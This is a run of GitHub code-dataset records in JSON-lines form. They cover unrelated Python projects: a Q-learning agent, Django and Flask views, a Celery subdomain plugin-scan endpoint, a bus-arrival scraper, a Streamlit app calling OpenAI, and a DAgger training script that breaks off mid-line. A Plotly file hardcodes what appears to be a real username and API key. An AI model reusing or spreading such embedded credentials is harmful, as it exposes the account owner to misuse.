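assert not is_leap(1900) and not is_leap(2023)
```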
self.__env.step(action)\r\n self.__Q[state][action] += self.__alpha * (\r\n reward + self.__gamma * self.__Q[next_state].max() - self.__Q[state][action])\r\n state = next_state\r\n rewards.append(reward)\r\n\r\n if self.__episode.value % self.__show_interval == 0:\r\n self.__show()\r\n\r\n try:\r\n self.__episode_rewards[(self.__episode.value)//self.__plot_interval] += sum(rewards)/len(rewards)/self.__plot_interval\r\n except:\r\n self.__episode_rewards.append(sum(rewards)/len(rewards)/self.__plot_interval)\r\n\r\n self.__episode.value += 1\r\n \r\n def __show(self):\r\n with self.__out:\r\n screen = self.__env.render()\r\n clear_output(wait=True)\r\n plt.clf()\r\n \r\n plt.subplot(1,2,1)\r\n plt.plot(np.arange(len(self.__episode_rewards)+1) * self.__plot_interval, [0] + (self.__episode_rewards), marker = 'o')\r\n plt.subplot(1,2,2)\r\n plt.imshow(screen) # screen 배열을 이미지로 출력합니다.\r\n \r\n plt.show()\r\n\r\n def __test(self, button):\r\n with self.__out:\r\n self.__env.reset()\r\n cur_state=0\r\n done = False\r\n self.__show()\r\n while not done:\r\n next_state, reward, done, info,_ = self.__env.step(self.__Q[cur_state].argmax())\r\n cur_state = next_state\r\n with self.__out:\r\n print(\"테스트중입니다....\")\r\n self.__show()","repo_name":"team-monolith-contents/AI_09","sub_path":"09_성장하는_인공지능_강화학습_알아보기/CodleAI.py","file_name":"CodleAI.py","file_ext":"py","file_size_in_byte":4174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"71097630031","text":"\nfrom glob import glob\nimport random\n\nimport torch\nfrom torch_geometric.data import Data, Dataset\n\nfrom molecular_graphs import MolecularGraphs\n\nfeatureList = [\"atomic_number\"]\n\nclass MoleculeGraphDataSet(Dataset):\n\n r\"\"\"Data set class to load molecular graph data\"\"\"\n\n def __init__(\n self,\n database_dir: str,\n graphs: MolecularGraphs,\n nMaxEntries: int = None,\n seed: int = 42,\n transform: object = None,\n pre_transform: object = None,\n pre_filter: object = None,\n ) -> None:\n\n r\"\"\"\n\n Args:\n\n database_dir (str): the directory where the data files reside\n\n graphs: an object of class MolecularGraphs whose function is\n to read each file in the data-base and return a\n graph constructed according to the particular way\n implemented in the class object (see MolecularGraphs\n for a description of the class and derived classes)\n\n nMaxEntries (int): optionally used to limit the number of clusters\n to consider; default is all\n\n seed (int): initialises the random seed for choosing randomly\n which data files to consider; the default ensures the\n same sequence is used for the same number of files in\n different runs\n\n \"\"\"\n\n super().__init__(database_dir, transform, pre_transform, pre_filter)\n\n self.database_dir = database_dir\n\n self.graphs = graphs\n\n filenames = database_dir + \"/*.xyz\"\n\n files = glob(filenames)\n\n self.n_molecules = len(files)\n\n r\"\"\"\n filenames contains a list of files, one for each cluster in\n the database if nMaxEntries != None and is set to some integer\n value less than n_molecules, then nMaxEntries clusters are\n selected randomly for use.\n \"\"\"\n\n if nMaxEntries and nMaxEntries < self.n_molecules:\n\n self.n_molecules = nMaxEntries\n random.seed(seed)\n self.filenames = random.sample(files, nMaxEntries)\n\n else:\n\n self.n_molecules = len(files)\n self.filenames = files\n\n def len(self) -> int:\n r\"\"\"return the number of entries in the database\"\"\"\n\n return self.n_molecules\n\n def get(self, 
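The update inside `__learn` above is the standard tabular Q-learning rule, `Q[s][a] += alpha * (r + gamma * max(Q[s']) - Q[s][a])`. A tiny worked example with the same `alpha` and `gamma` as the FrozenLake agent:

```python
import numpy as np

alpha, gamma = 0.95, 0.8          # same hyperparameters as the agent above
Q = np.zeros((2, 2))              # toy table: 2 states x 2 actions
s, a, r, s_next = 0, 1, 1.0, 1    # one transition that earned reward 1

Q[s][a] += alpha * (r + gamma * Q[s_next].max() - Q[s][a])
print(Q[s][a])                    # 0.95: one step toward the return estimate
```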
idx: int) -> Data:\n\n r\"\"\"\n This function loads from file the corresponding data for entry\n idx in the database and returns the corresponding graph read\n from the file\n \"\"\"\n\n if torch.is_tensor(idx):\n idx = idx.tolist()\n\n file_name = self.filenames[idx]\n\n molecule_graph = self.graphs.molecule2graph(file_name)\n\n return molecule_graph\n\n def get_file_name(self, idx: int) -> str:\n\n r\"\"\"Returns the cluster data file name\"\"\"\n\n return self.filenames[idx]\n","repo_name":"migueldc99/gcnn","sub_path":"molecule_graph_dataset.py","file_name":"molecule_graph_dataset.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"25785540661","text":"n=int(input())\np=1\ns=0\nt=n\nwhile(n>0):\n d=n%10\n p=p*d\n s=s+d\n n=n//10\nif p==s:\n print('Spy Number')\nelse:\n print('Not Spy Number')","repo_name":"21A91A05D0/codemind-python","sub_path":"Spy_Number.py","file_name":"Spy_Number.py","file_ext":"py","file_size_in_byte":148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"5673303655","text":"from django.contrib import messages\nfrom django.db import IntegrityError\nfrom django.shortcuts import render, redirect\n\nfrom django_tables2 import RequestConfig\n\nfrom sis.authentication_helpers import role_login_required\n\nfrom sis.elements.section import ProfSectionsTable, SectionFilter\nfrom sis.elements.referenceitem import ReferenceItemForm\nfrom sis.models import (Course, Professor, Section, Semester, Student, Profile, SectionStudent,\n ReferenceItem, SectionReferenceItem)\n\n\n@role_login_required(Profile.ACCESS_PROFESSOR)\ndef index(request):\n data = {\n 'current_semester': Semester.current_semester(),\n 'registration_open': Semester.semesters_open_for_registration(),\n }\n data.update(request.user.profile.unread_messages())\n return render(request, 'professor/home_professor.html', data)\n\n\n@role_login_required(Profile.ACCESS_PROFESSOR)\ndef sections(request):\n the_prof = request.user.profile.professor\n sections_qs = Section.objects.filter(professor=the_prof)\n sections = {}\n # set up our sections qs dictionary by semester\n for sect in sections_qs:\n if sect.semester.finalized():\n continue\n if sect.semester.name not in sections.keys():\n sections[sect.semester.name] = [sect.semester.id]\n\n # fill in our sections dictionary with tables by semester\n for name, sem in sections.items():\n qs = sections_qs.filter(semester=sem[0])\n table = ProfSectionsTable(qs)\n RequestConfig(request, paginate={\"per_page\": 25, \"page\": 1}).configure(table)\n sections[name].append(table)\n\n data = {\n 'semesters': sections.keys(),\n }\n if request.method == 'POST':\n sem = request.POST.get('semester')\n table = sections[sem][1]\n data['table'] = table\n else:\n sem = Semester.current_semester()\n if sem is not None:\n sem = sem.name\n values = sections.get(sem)\n if values is not None:\n table = values[1]\n data['table'] = table\n return render(request, 'professor/sections.html', data)\n\n\n@role_login_required(Profile.ACCESS_PROFESSOR)\ndef section(request, sectionid):\n data = {}\n aSection = Section.objects.get(id=sectionid)\n references = aSection.sectionreferenceitem_set.all()\n ssects = SectionStudent.objects.filter(section=aSection)\n if request.method == \"POST\":\n for student in aSection.students.all():\n if request.POST.get(str(student.pk)) != 'No Change':\n ssect = ssects.get(student=student)\n grade_value = 
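The spy-number check above compares a number's digit sum with its digit product. As a reusable function, with a quick example (1124 qualifies because 1+1+2+4 = 1*1*2*4 = 8):

```python
def is_spy(n: int) -> bool:
    s, p = 0, 1
    for d in map(int, str(n)):
        s += d      # digit sum
        p *= d      # digit product
    return s == p

print(is_spy(1124), is_spy(124))   # True False
```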
request.POST.get(str(student.pk))\n ssect.grade = grade_value if grade_value != 'No Grade Assigned' else None\n ssect.save()\n data['grade_submitted'] = {True}\n grades = (\n ('No Change', 'No Change'),\n ('No Grade Assigned', 'No Grade Assigned'),\n ) + SectionStudent.POINTS\n data.update({\n 'grades': grades,\n 'section': aSection,\n 'ssects': ssects,\n 'references': references,\n 'can_grade': not aSection.semester.finalized(),\n })\n return render(request, 'professor/section.html', data)\n\n\n@role_login_required(Profile.ACCESS_PROFESSOR)\ndef student(request, studentid):\n stud = Student.objects.get(pk=studentid)\n ssects = stud.sectionstudent_set.all()\n data = {'student': stud, 'ssects': ssects}\n return render(request, 'professor/student.html', data)\n\n\n@role_login_required(Profile.ACCESS_PROFESSOR)\ndef add_reference(request, sectionid):\n data = {'sectionid': sectionid}\n\n if request.method == 'POST':\n form = ReferenceItemForm(request.POST)\n data['form'] = form\n\n if form.is_valid():\n new_ref = form.save(commit=False)\n new_ref.professor = request.user.profile.professor\n section = Section.objects.get(id=sectionid)\n course = Course.objects.get(id=section.course.id)\n new_ref.course = course\n\n try:\n new_ref.save()\n except IntegrityError as e:\n if 'UNIQUE constraint' in e.args[0]:\n messages.error(request, \"That Reference Item already exists.\")\n else:\n messages.error(request,\n \"There was a problem saving the new item to the database.\")\n return render(request, 'professor/reference_add.html', data)\n\n # Specify all current+future sects by reg date or only current sections by reg date\n if request.POST.get('semester_future') == 'future':\n sects_to_update = course.section_set.exclude(\n status__in=[Section.REG_CLOSED, Section.CANCELLED])\n else:\n sects_to_update = course.section_set.filter(semester=section.semester)\n\n for sect in sects_to_update:\n sect.refresh_reference_items()\n messages.success(request, \"New reference item successfully created\")\n return redirect('professor:section', sectionid)\n\n else:\n messages.error(request, \"Please correct the error(s) below\")\n return render(request, 'professor/reference_add.html', data)\n else:\n form = ReferenceItemForm()\n\n data['form'] = form\n return render(request, 'professor/reference_add.html', data)\n","repo_name":"csufmse/student_information_system","sub_path":"student-info-system/professor/views/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5388,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"26051067710","text":"class Solution:\n def checkSubSequence(self, I,P):\n l=r=0\n\n while l < len(I) and r < len(P):\n if I[l] == P[r]:\n l+=1\n r+=1\n else:\n r+=1\n\n if l==len(I):\n return True\n else:\n return False\n\n def lettersToDelete(self, I, P):\n if self.checkSubSequence(I,P) == False:\n return \"IMPOSSIBLE\"\n else:\n return len(P)-len(I)\n\n\nt = int(input())\nfor i in range(t):\n I = input()\n P = input()\n res = Solution().lettersToDelete(I, P)\n print(f\"Case #{i + 1}: {res}\")\n\n","repo_name":"seungjun-green/Google-KickStart","sub_path":"2022/Round A/Speed Typing.py","file_name":"Speed Typing.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"72631231311","text":"import streamlit as st\r\nimport openai\r\nimport time\r\nimport streamlit.components.v1 as components\r\nfrom streamlit.components.v1 import 
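The Speed Typing solution above runs a two-pointer scan: the text `I` can be typed from `P` using only deletions iff `I` is a subsequence of `P`, in which case exactly `len(P) - len(I)` deletions are needed. The same logic in a compact form; the `in`-on-an-iterator idiom consumes the iterator as it matches, giving a one-pass subsequence test:

```python
def letters_to_delete(I: str, P: str):
    it = iter(P)
    if all(ch in it for ch in I):    # subsequence test in one pass over P
        return len(P) - len(I)
    return "IMPOSSIBLE"

print(letters_to_delete("hello", "hheellloo"))  # 4
print(letters_to_delete("abc", "acb"))          # IMPOSSIBLE
```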
html\r\n\r\ndef main():\r\n\r\n \r\n st.set_page_config(\r\n page_title='p[AI]tch',\r\n initial_sidebar_state='collapsed',\r\n page_icon='📈',\r\n layout=\"wide\")\r\n\r\n hide_streamlit_style = \"\"\"\r\n \r\n \"\"\"\r\n st.markdown(hide_streamlit_style, unsafe_allow_html=True)\r\n\r\n def twitter_follow_button(username):\r\n follow_button = f'@{username}'\r\n return follow_button\r\n \r\n donate = \"\"\"\r\n
\r\n\r\n\r\n\"\"\r\n
\"\"\"\r\n \r\n s,t,q,r,z = st.columns([1,2,6,3,1])\r\n with t:\r\n st.header('📈 p[AI]tch:')\r\n with q:\r\n st.subheader(\r\n 'comparing the effort required to build something with AI a year ago VS now 🌠')\r\n with r:\r\n # Add content to the footer container\r\n st.markdown(\r\n '
chek the code at klein-t/p[AI]tch
', unsafe_allow_html=True)\r\n# Create the follow button\r\n twitter_handle = \"KleinTahiraj\"\r\n st.markdown(f'follow me on Twitter {twitter_follow_button(twitter_handle)}', unsafe_allow_html=True)\r\n ll,rr = st.columns([10,9], gap = 'small')\r\n with ll:\r\n st.markdown(f'or buy me a coffee', unsafe_allow_html=True)\r\n with rr:\r\n html(donate, height=60) \r\n \r\n\r\n n, left, right, m = st.columns(spec = [1,4,4,1], gap = 'medium')\r\n\r\n with left:\r\n st.subheader('ONE YEAR AGO...')\r\n \r\n \r\n tweet = \"\"\"\r\n
\r\n

I forced a bot to watch over 1,000 hours of startup pitch meetings and then asked it to re-create a startup pitch meeting of its own. Here is the first page. pic.twitter.com/BK1yBZ2EB2

— Roshan Patel (@roshanpateI) December 30, 2021\r\n
\r\n \r\n \"\"\"\r\n components.html(tweet, height=800)\r\n\r\n with right:\r\n st.subheader('NOW...')\r\n \r\n\r\n openai.api_key = st.secrets[\"OPENAI_API_KEY\"]\r\n\r\n prompt_path = 'prompt.txt'\r\n with open(prompt_path, \"r\", encoding=\"utf-8\") as prompt:\r\n template = prompt.read()\r\n\r\n output = openai.ChatCompletion.create(\r\n model=\"gpt-3.5-turbo\",\r\n temperature=0.93,\r\n messages=[\r\n {\"role\": \"system\", \"content\": template},\r\n {\"role\": \"user\", \"content\": \"\\n \\n # NOW IS YOUR TURN### Script: \"},\r\n ],\r\n )\r\n message = output[\"choices\"][0][\"message\"][\"content\"]\r\n output_elem = st.empty()\r\n \r\n stream_message=''\r\n for char in message:\r\n stream_message = stream_message + char\r\n output_elem.markdown(\r\n f'
{stream_message}
', unsafe_allow_html=True)\r\n time.sleep(0.001)\r\n \r\n\r\n x, uno, due, y = st.columns([1, 4, 4, 1], gap='medium')\r\n with uno:\r\n st.markdown(\"\"\"---\"\"\")\r\n st.write('...get the scripts for 1,000 hours of pitches. Clean them. Select the model, likely BERT or GPT-2. Format training data. Fine-tune the model. Wait. Give the model a prompt. Prey. Get a funny (not on purpose) but incoherent output :p')\r\n \r\n with due:\r\n st.markdown(\"\"\"---\"\"\")\r\n st.write('...write a 30-line prompt with some instructions and some examples. Give it to a LLM. Get a funny (on purpose) and coherent output c:')\r\n \r\n \r\n _,ff, dd,_ = st.columns([1, 4, 4, 1], gap='medium')\r\n with ff:\r\n st.write('ESTIMATED TIME: days')\r\n with dd:\r\n st.write('ESTIMATED TIME: 20 minutes')\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"klein-t/p-AI-tch","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"1376093222","text":"import plotly\nfrom plotly import tools\nimport plotly.graph_objs as go\nfrom plotly.graph_objs import *\nimport plotly.plotly as py\nimport numpy as np\n\n\nclass graph:\n def __init__(self):\n plotly.tools.set_credentials_file(username='LassiPee', api_key='qNE4nDymb62oYrcqhegQ')\n\n def cdf(self, datain, datain2, name1, name2):\n #\n # cumsum = np.cumsum(datain)\n #\n # trace = Scatter(x=[i for i in range(len(cumsum))], y= 10.0 * cumsum / np.linalg.norm(cumsum),\n # marker=dict(color='rgb(150, 25, 120)'))\n # layout = go.Layout(\n # title=\"Cumulative Distribution Function\"\n # )\n #\n # fig = go.Figure(data=go.Data([trace]), layout=layout)\n # py.plot(fig, filename='cdf-dataset')\n #\n # # retrieve event times and latencies from the file\n # compute the CDF\n cdfx = np.sort(datain)\n cdfy = np.linspace(1 / len(datain), 1.0, len(datain))\n # plot the CDF\n trace1 = Scatter(\n x=cdfx,\n y=cdfy,\n name=name1,\n )\n cdfx2 = np.sort(datain2)\n cdfy2 = np.linspace(1 / len(datain2), 1.0, len(datain2))\n # plot the CDF\n trace2 = Scatter(\n x=cdfx2,\n y=cdfy2,\n name=name2,\n )\n\n fig = tools.make_subplots(rows=2, cols=1)\n\n fig.append_trace(trace2, 1, 1)\n fig.append_trace(trace1, 2, 1)\n fig['layout'].update(height=600, width=600, title='CDF curves')\n py.plot(fig, filename='cdf')\n\n def plot(self, x, y1, y2, y3, y4, y5, y1_name, y2_name, y3_name, y4_name, y5_name):\n\n trace1 = Scatter(\n x= x,\n y= y1,\n name=y1_name,\n )\n trace2 = Scatter(\n x=x,\n y=y2,\n name = y2_name,\n )\n trace3 = Scatter(\n x=x,\n y=y3,\n name = y3_name,\n )\n trace4 = Scatter(\n x=x,\n y=y4,\n name = y4_name,\n )\n trace5 = Scatter(\n x=x,\n y=y5,\n name=y5_name,\n )\n cdfx = np.sort(y2)\n cdfy = np.linspace(1 / len(y2), 1.0, len(y2))\n # plot the CDF\n trace6 = Scatter(\n x=cdfx,\n y=cdfy,\n name=y2_name,\n )\n fig = tools.make_subplots(rows=6, cols=1)\n\n fig.append_trace(trace3, 1, 1)\n fig.append_trace(trace2, 2, 1)\n fig.append_trace(trace1, 3, 1)\n fig.append_trace(trace4, 4, 1)\n fig.append_trace(trace5, 5, 1)\n fig.append_trace(trace6, 6, 1)\n fig['layout'].update(height=600, width=600, title='Stacked subplots')\n py.plot(fig, filename='stacked-subplots')\n","repo_name":"LassiHoo/Thesis","sub_path":"Graph.py","file_name":"Graph.py","file_ext":"py","file_size_in_byte":2755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"27169542969","text":"from flask import 
Blueprint,request\nfrom .tasks import check_plugins_task\nfrom app import pa_domain,pa_taskid\nfrom celery_app.utils.utils import get_current_time\n\n\npluginscan_blueprint = Blueprint(\"pluginscan\", __name__, url_prefix='/pluginscan')\n\n@pluginscan_blueprint.route('/scan',methods=['POST'])\n#传入一个插件id的列表,一个二级域名的列表,开始对每一个二级域名进行每一个插件的扫描\ndef plugins_scan_by_subdomain():\n if request.method==\"POST\":\n json_data=request.get_json()\n plugins_id_list=json_data['plugins_id_list']\n domains_list=json_data['domains_list']\n # 调用celery任务\n check_plugins_task.delay(plugins_id_list,domains_list)\n return {\"code\": 200, \"msg\": \"plugin scan task success\"}\n\n\n#传入一个一级域名,对数据库内该一级域名的所有二级域名进行每一个插件的扫描\n@pluginscan_blueprint.route('/scanbydomain',methods=['POST'])\ndef plggins_scan_by_maindomain():\n if request.method==\"POST\":\n #获取POST过来的数据\n json_data = request.get_json()\n plugins_id_list = json_data['plugins_id_list']\n domain = json_data['domain']\n #声明二级域名的列表\n\n subdomain_list=[]\n #通过domain获取所有的该domain的二级域名\n index=pa_domain.find_one({\"domain\":domain})\n if index:\n subdomain=index['subdomain']\n for sub in subdomain:\n subdomain_list.append(sub[\"sub_domain\"])\n #没有在数据库中找到该主域名\n else:\n return {\"code\": 202, \"msg\": \"did not find domain {0}\".format(domain)}\n\n if len(subdomain_list)>0:\n # 调用celery任务,并且获取任务id\n r=check_plugins_task.delay(plugins_id_list, subdomain_list)\n #记录任务id\n pa_taskid.insert({\"task_id\":r.task_id,\"add_time\":get_current_time(),\"task_info\":\"对{0}等域名进行插件扫描\".format(subdomain_list[0])})\n\n\n return {\"code\": 200, \"msg\": \"plugin scan task success\"}\n return {\"code\": 201, \"msg\": \"POST method need\"}\n\n\n\n\n\n\n\n","repo_name":"qq431169079/papapa","sub_path":"celery_app/pluginviews.py","file_name":"pluginviews.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"83"} +{"seq_id":"10786840325","text":"from django.db.models import Model\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.core.exceptions import ImproperlyConfigured\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom charts import BaseChart\n\nclass ChartPool(object):\n def __init__(self):\n self._charts = {}\n self._models = []\n\n def register_chart(self, chart_class):\n if not issubclass(chart_class, BaseChart):\n raise ValueError(_('Registered class must be a subclass '\n ' of charts.BaseChart)'))\n if not chart_class.slug:\n raise ImproperlyConfigured(_(\"Chart class must have a 'slug'\"))\n self._charts[chart_class.slug] = chart_class\n\n def get_all_charts(self):\n return [(chart_slug, chart_class.display_name or chart_class.__name__)\n for chart_slug, chart_class in self._charts.items()]\n\n def get_chart_class(self, chart_slug):\n return self._charts.get(chart_slug)\n\n def register_model(self, model):\n if not issubclass(model, Model):\n raise ValueError(_('Registered model must be a subclass '\n 'of djando.db.models.Model'))\n content_type = ContentType.objects.get_for_model(model)\n self._models.append(content_type.id)\n\n def get_all_models(self):\n return self._models\n\nchart_pool = ChartPool()\n","repo_name":"soad241/django-charts","sub_path":"charts/cms_plugin/chart_admin.py","file_name":"chart_admin.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"83"} +{"seq_id":"16784477700","text":"import pandas as pd\r\nimport csv\r\nimport time\r\n\r\nbus_data = 
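To gloss the Chinese comments in the pluginscan blueprint above: the first route takes a list of plugin ids plus a list of subdomains and hands the scan to Celery; the second takes a root domain, collects its stored subdomains from the database, dispatches the scan with `.delay()`, and records the returned task id. A minimal stand-alone sketch of that dispatch pattern (the broker URL and task body are illustrative, and actually running `.delay()` requires a reachable broker):

```python
from celery import Celery

app = Celery("scans", broker="redis://localhost:6379/0")  # illustrative broker

@app.task
def check_plugins(plugin_ids, domains):
    # Placeholder body; the real task walks every (plugin, domain) pair.
    return {"plugins": plugin_ids, "domains": domains}

if __name__ == "__main__":
    result = check_plugins.delay([1, 2], ["a.example.com", "b.example.com"])
    print(result.id)   # the task id the blueprint stores in pa_taskid
```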
[]\r\npaths = []\r\npath_data = []\r\n\r\n\r\ndef arrive_time(number, trip, begin, end):\r\n url = f\"https://user.frdm.info/ckhung/saas/bus/taichung/timing4.php?rid={number}&timeformat=1&refresh=0&reverse=0&hidecar=0&dark=0&ivrno=&stopID=&stopName=\"\r\n df = pd.read_html(url)[3].values.tolist()\r\n # print(df)\r\n minutes = 0\r\n last_m = 0\r\n begin_m = 0\r\n end_m = 0\r\n begin_s = \"\"\r\n end_s = \"\"\r\n license_plate = \"\"\r\n b = True\r\n\r\n c = '↓'\r\n plate = 0\r\n time_ = 1\r\n if trip == \"回程\":\r\n df = df[::-1]\r\n plate = 4\r\n time_ = 3\r\n c = '↑'\r\n\r\n for station in df:\r\n current_m = convert_minute(station[time_])\r\n if not b:\r\n if station[plate] != c and license_plate != station[plate]:\r\n license_plate = station[plate]\r\n minutes += last_m\r\n if station[2] == end:\r\n minutes += current_m\r\n end_m = minutes\r\n if end_m == 0:\r\n end_s = \"即將到站\"\r\n else:\r\n end_s = f\"{end_m}分鐘\"\r\n break\r\n\r\n if b and station[2] == begin:\r\n begin_m = current_m\r\n license_plate = station[plate]\r\n if is_minute(station[time_]):\r\n begin_s = f\"{begin_m}分鐘\"\r\n else:\r\n begin_s = station[time_]\r\n b = False\r\n last_m = current_m\r\n\r\n in_bus_m = end_m - begin_m\r\n in_bus_s = f\"{in_bus_m}分鐘\"\r\n print(number, begin_m, end_m, in_bus_m, begin_s, end_s, in_bus_s)\r\n return begin_m, end_m, in_bus_m, begin_s, end_s, in_bus_s\r\n\r\n\r\ndef is_minute(s):\r\n if len(s) > 2 and s[:-2].isnumeric():\r\n return True\r\n return False\r\n\r\n\r\ndef convert_minute(s):\r\n m = 0\r\n if is_minute(s):\r\n m = int(s[:-2])\r\n\r\n return m\r\n\r\n\r\ndef read_bus_data():\r\n with open('bus.csv', newline='', encoding=\"utf-8\") as csvfile:\r\n rows = csv.reader(csvfile)\r\n\r\n next(rows, None)\r\n next(rows, None)\r\n tmp = []\r\n number = '???'\r\n trip = '???'\r\n for row in rows:\r\n if number == row[0] and trip == row[5]:\r\n tmp.append(row[4])\r\n else:\r\n bus_data.append(tmp)\r\n tmp = []\r\n number = row[0]\r\n trip = row[5]\r\n tmp.append(row[0])\r\n tmp.append(row[1])\r\n tmp.append(row[2])\r\n tmp.append(row[5])\r\n tmp.append(row[4])\r\n\r\n del bus_data[0]\r\n\r\n\r\ndef in_path(path, begin, end):\r\n b = True\r\n in_path_ = False\r\n for station in path[4:]:\r\n if b and station == begin:\r\n b = False\r\n if not b and station == end:\r\n in_path_ = True\r\n break\r\n\r\n return in_path_\r\n\r\n\r\ndef find_path(begin, end):\r\n paths.clear()\r\n for path in bus_data:\r\n if in_path(path, begin, end):\r\n paths.append(path[:4])\r\n\r\n\r\ndef get_path_data(begin, end):\r\n path_data.clear()\r\n find_path(begin, end)\r\n for path in paths:\r\n time.sleep(0.5)\r\n time_data = arrive_time(path[0], path[3], begin, end)\r\n\r\n if time_data[3] == \"末班駛離\" or time_data[4] == \"末班駛離\" or time_data[3] == \"離站\" or time_data[4] == \"離站\":\r\n continue\r\n a = 1\r\n path_data.append(path + list(time_data))\r\n print(path_data)\r\n return path_data\r\n\r\n\r\nif __name__ == \"__main__\":\r\n pass\r\n # read_bus_data()\r\n # print(in_path(bus_data[0], '忠明南路', '永春東七路'))\r\n # arrive_time('324', '回程', '牛頂頭', '台中精機')\r\n # find_path('臺中教育大學', '北區運動中心')\r\n # print(paths)\r\n # print(get_path_data('臺中教育大學', '干城站'))\r\n\r\n","repo_name":"LeeByte-R/Bus-Wait-Search","sub_path":"bus.py","file_name":"bus.py","file_ext":"py","file_size_in_byte":3863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"23813531096","text":"\"\"\"\nFile: search.py\nDefines function for linearSearch.\n\"\"\"\n\ndef linearSearch(target, 
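For readers who don't read Chinese: the bus tracker above scrapes a timing table with pandas `read_html`, where each cell holds either a countdown such as "5分鐘" ("5 minutes") or a status string such as "即將到站" ("arriving soon"); `is_minute`/`convert_minute` peel the two-character 分鐘 suffix off countdown cells. The same parse as one self-contained helper:

```python
def minutes_or_none(cell: str):
    # "12分鐘" -> 12; status strings like "即將到站" -> None
    return int(cell[:-2]) if len(cell) > 2 and cell[:-2].isnumeric() else None

print(minutes_or_none("12分鐘"), minutes_or_none("即將到站"))   # 12 None
```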
lyst):\n \"\"\"Returns the position of the target item if found, or -1 otherwise.\"\"\"\n index = 0\n while index < len(lyst):\n if target == lyst[index]:\n return index\n index += 1\n\n return -1\n\n \ndef main():\n \"\"\"Tests with three lists.\"\"\"\n print(linearSearch(3, [3, 5, 7, 9, 10]))\n print(linearSearch(3, [0, 1, 2]))\n # Will stop at second position.\n print(linearSearch(3, [0, 2, 4, 6]))\n \nif __name__ == \"__main__\":\n main()\n","repo_name":"chekel321/Linear-Search-python-app","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"15350495271","text":"import argparse\n\nimport time\nimport os\nimport pickle\nimport numpy as np\nfrom utils.tensorboard_logging import Logger\n\n# kuka environment for Position control\nfrom envs.kukaEnvs import PCEnv\n\n# Save GIF of agent\nimport imageio\n\n# Debugging\nimport IPython\nimport utils.timing\nimport time\n\n# Prevent deprecation warnings for Tensorflow 1\nimport logging\nlogging.getLogger('tensorflow').setLevel(logging.ERROR)\n\nimport os, shutil\n\ndef import_sb():\n \"Avoid long imports before parsing\"\n # RL Algorithms and envs\nfrom stable_baselines.common.policies import MlpPolicy, FeedForwardPolicy, \\\n LstmPolicy\nfrom stable_baselines.common.vec_env import DummyVecEnv\nfrom stable_baselines import PPO2, A2C\n\n# Pre-training (Behavior Cloning)\nfrom stable_baselines.gail import ExpertDataset\n\n\ndef delete_contents(folder):\n if os.path.exists(folder):\n for filename in os.listdir(folder):\n file_path = os.path.join(folder, filename)\n try:\n if os.path.isfile(file_path) or os.path.islink(file_path):\n os.unlink(file_path)\n elif os.path.isdir(file_path):\n shutil.rmtree(file_path)\n except Exception as e:\n print('Failed to delete %s. 
Reason: %s' % (file_path, e))\n\ntimer = timing.timer()\n\nclass CustomLSTMPolicy(LstmPolicy):\n def __init__(self, sess, ob_space, ac_space, n_env, n_steps, n_batch, n_lstm=64, reuse=False, **_kwargs):\n super().__init__(sess, ob_space, ac_space, n_env, n_steps, n_batch, n_lstm, reuse,\n net_arch=[8, 'lstm', dict(vf=[5, 10], pi=[10])],\n layer_norm=True, feature_extraction=\"mlp\", **_kwargs)\n\n# Custom MLP policy of three layers of size 128 each\nclass CustomMLPPolicy(FeedForwardPolicy):\n def __init__(self, *args, **kwargs):\n super(CustomMLPPolicy, self).__init__(*args, **kwargs,\n net_arch=[24, 150, 150,\n dict(pi=[128, 128, 128],\n vf=[128, 128, 128])],\n feature_extraction=\"mlp\")\n\ndef test_agent(model):\n \"Run the agent and recover its trajectory\"\n traj = []\n obs = model.env.reset()\n traj.append(obs[0])\n action = model.predict(obs, deterministic=False)\n for _ in range(5000):\n action = model.predict(obs, deterministic=True)\n obs, _, _, _ = model.env.step(action[0]) # PPO2 vectorizes the env\n traj.append(obs[0]) # observation is vectorized\n model.env.reset()\n return traj\n\ndef visualize_agent(model):\n visualize_env = PCEnv(render=True)\n obs = visualize_env.reset()\n action = model.predict(obs)\n for _ in range(5000):\n action = model.predict(obs)\n obs, _, _, _ = visualize_env.step(action[0]) # PPO2 vectorizes the env\n time.sleep(1/240)\n visualize_env.close()\n\ndef save_gif(model, filename=\"DAgger_agent.gif\", time=5, fps=30):\n images = []\n obs = model.env.reset()\n img = model.env.render(mode='rgb_array')\n images.append(img)\n for i in range(int(time*240)):\n action, _ = model.predict(obs, deterministic=True)\n obs, _, _ ,_ = model.env.step(action)\n # fps is lower than render timestep, skip frames for real-time gif\n if i % int(240/fps) == 0:\n img = model.env.render(mode='rgb_array')\n images.append(img)\n\n # Save to Gif File\n imageio.mimsave(\n filename,\n [np.array(img) for i, img in enumerate(images) if i%2 == 0],\n fps=fps)\n\ndef Dagger(env, algorithm, policy, iterations,\n batch_size=256,\n episodes_per_it=1,\n epochs_per_dataset=10,\n gif_interval=None):\n\n log_dir = \"log/DAgger\"\n os.makedirs(log_dir, exist_ok=True)\n tb_log = Logger(log_dir)\n\n # Save a gif of the model every 10% of the total number of iterations\n if gif_interval is None:\n # Prevent modulo by 